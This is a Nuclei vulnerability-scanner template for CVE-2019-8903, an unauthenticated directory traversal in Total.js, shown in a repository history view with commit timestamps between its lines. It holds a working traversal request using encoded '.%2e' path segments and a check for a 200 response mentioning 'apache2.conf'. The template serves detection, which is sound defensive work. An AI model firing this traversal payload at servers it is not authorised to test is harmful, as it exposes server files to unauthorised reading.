nuclei-templates/cves/2019/CVE-2019-8903.yaml

21 lines
442 B
YAML
Raw Normal View History

id: cve-2019-8903
2020-04-08 07:36:36 +00:00
info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
2020-04-08 08:45:44 +00:00
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
2020-04-08 07:36:36 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 11:17:49 +00:00
- type: word
words:
- "apache2.conf"
part: body